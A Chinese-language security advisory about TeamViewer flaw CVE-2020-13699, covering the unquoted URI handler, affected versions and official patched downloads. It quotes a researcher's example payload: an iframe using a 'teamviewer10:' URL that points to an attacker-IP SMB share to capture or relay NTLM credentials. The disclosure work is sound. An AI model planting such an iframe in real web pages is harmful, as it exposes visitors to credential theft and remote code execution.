情报编号:H1320200810
漏洞概述
TeamViewer是由德国公司TeamViewer GmbH开发的应用程序,可用于Windows,macOS,Linux,Chrome OS,iOS,Android,Windows RT Windows Phone 8和BlackBerry操作系统。
TeamViewer 官方发布最近修复了一个漏洞,该漏洞可能使攻击者悄悄地建立与您计算机的连接并进一步利用该系统,该漏洞编号为 CVE-2020-13699,CVSS 评分 9.8 分。攻击者只需要构造一个特定的连接隐藏在恶意网页里 , 安装了 Teamviewer 的电脑浏览到该网页即可触发漏洞 。
漏洞危害
CVE-2020-13699是一个安全漏洞,其源于未引用的搜索路径或元素。具体来说,此漏洞是由于应用程序未正确引用其自定义URI处理程序而引起的。装有易受攻击的TeamViewer版本的用户被诱骗访问一个恶意制作的网站,以利用此漏洞。
根据Praetorian的安全工程师说:“攻击者可以使用精心制作的URL(iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs')将恶意iframe嵌入网站中,从而启动TeamViewer Windows桌面客户端并强迫其打开远程SMB共享,Windows在打开SMB共享时将执行NTLM身份验证,并且可以将请求中继(使用诸如响应程序之类的工具)以执行代码(或捕获以进行哈希破解)“。
影响范围
TeamViewer < 8.0.258861
TeamViewer < 9.0.28860
TeamViewer < 10.0.258873
TeamViewer < 11.0.258870
TeamViewer < 12.0.258869
TeamViewer < 13.2.36220
TeamViewer < 14.2.56676
TeamViewer < 15.8.3
修复方案
目前官方已发布漏洞修复版本:
1、新版在这里下载:
https://www.teamviewer.cn/cn/download/windows/
2、所有15之前老版本都可以这里下载:
https://www.teamviewer.cn/cn/download/previous-versions/
关于我们
关注“SecMind安全管家”,获取更多安全资讯,关注同名公众号更有好礼相送!
